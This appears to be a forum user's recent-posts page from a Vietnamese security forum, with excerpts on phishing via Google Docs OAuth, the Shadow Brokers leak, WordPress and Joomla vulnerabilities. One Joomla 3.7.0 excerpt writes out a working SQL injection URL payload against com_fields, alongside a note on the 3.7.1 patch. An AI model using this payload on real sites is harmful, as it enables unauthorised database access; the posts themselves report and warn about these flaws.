Recent Content by nonellldd

Bách Khoa cũng có ngành ATTT nhé, nhưng mình vẫn thấy KMA vẫn là vô đối nhé!

Vẫn còn 1 trường hợp nữa là cococ cung cấp 1 dịch vụ ẩn cho người dùng trình duyệt cococ. Đó là hỗ trợ người dùng bị chặn facebook (các công ty có thể chặn nhân viên truy cập facebook) và những request truy cập đến facebook từ trình duyệt cococ sẽ đi qua một số ip của cococ. Đây là 1 khả năng...

Bạn có thể show email người gửi không?

bài này có ảnh mà bị lỗi rồi :D

Lâu rồi mình không viết bài, hôm nay ngứa tay gõ text vài dòng chia sẻ 2 opensource khá hay và mình thấy hữu ích. 1. asciinema Đây là opensource dùng để capture hình ảnh từ terminal thành video dưới dạng json sau đó chia sẻ trên trang https://asciinema.org/. Cái này ở chỗ có thể copy được...

làm sao bạn cài được chương trình vào máy tính người khác.

có phải bác chủ thớt quản trị website này không,

Joomla 3.7.0 mới phát hiện có hỗ hổng sqli. Mã khai thác thuộc loại đơn giản dễ sử dụng /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,(select concat(0x3a, table_name) from information_schema.columns limit 3,1 ),0) HIện tại có thể update bản vá 3.7.1 cho hỗ...

nếu đọc và gửi mail bạn phải sử dụng API của google => cái này gg biết, nhưng không dễ gg cung cấp thông tin log ra ngoài. gửi mail xong người ta sẽ xóa ngay thư gửi, người khác rep lại => có chứa nội dung thư gửi => phát hiện là xóa ngay các trường hợp người nhận được thư lừa đảo trả lời bằng...

Tấn công loại này sẽ không lấy được mật khẩu mail, nhưng có quyền truy cập vào hộp thư đến, có quyền đọc vào gửi mail. Nguy hiểm hay không tùy thuộc vào nội dung trong mail, thông tin ngân hàng, video hình ảnh nhạy cảm, bí mật công ty, .... Sau khi xóa quyền truy cập của app thì app sẽ không...

Sử dụng proxy vào lại các đại ca ơi, em vào lại bình thường rồi

Một hình thức tấn công phishing mới đang phát tán rộng rãi. Bạn nhận được được 1 link tài liệu từ mail của một người quen với nội dung chia sẻ 1 link google docs. Click xem liên kết đó, bạn sẽ được chuyển sang 1 trang với thông báo "Google Docs would like to read, send and delete emails, as well...

Công cụ hack của cơ quan tình báo Mỹ NSA bị công khai Vụ tiết lộ này được thực hiện bởi nhóm hacker tự xưng là Shadow Brokers(SB). Câu chuyện bắt đầu từ tháng 8 năm 2016. SB publish các file nén với password mạnh chứa các tool của NSA, đồng thời đòi tiền chuộc, tuy nhiên hành động thất bại. Các...

@script tấn công qua lỗ hổng của nền tảng joomla

Trong tháng trước, wordpress đã ghi nhận lỗ hổng nghiêm trọng nằm trong 2 phiên bản 4.7.0 và 4.7.1 cho phép kẻ tấn công có thể thực hiện thay đổi nội dung các bài viết, giao diện website. Đã vá trong phiên bản 4.7.2 Trong 4.7.0 và 4.7.1 wordpress bổ sung thêm REST api. Do mới phát triển nên...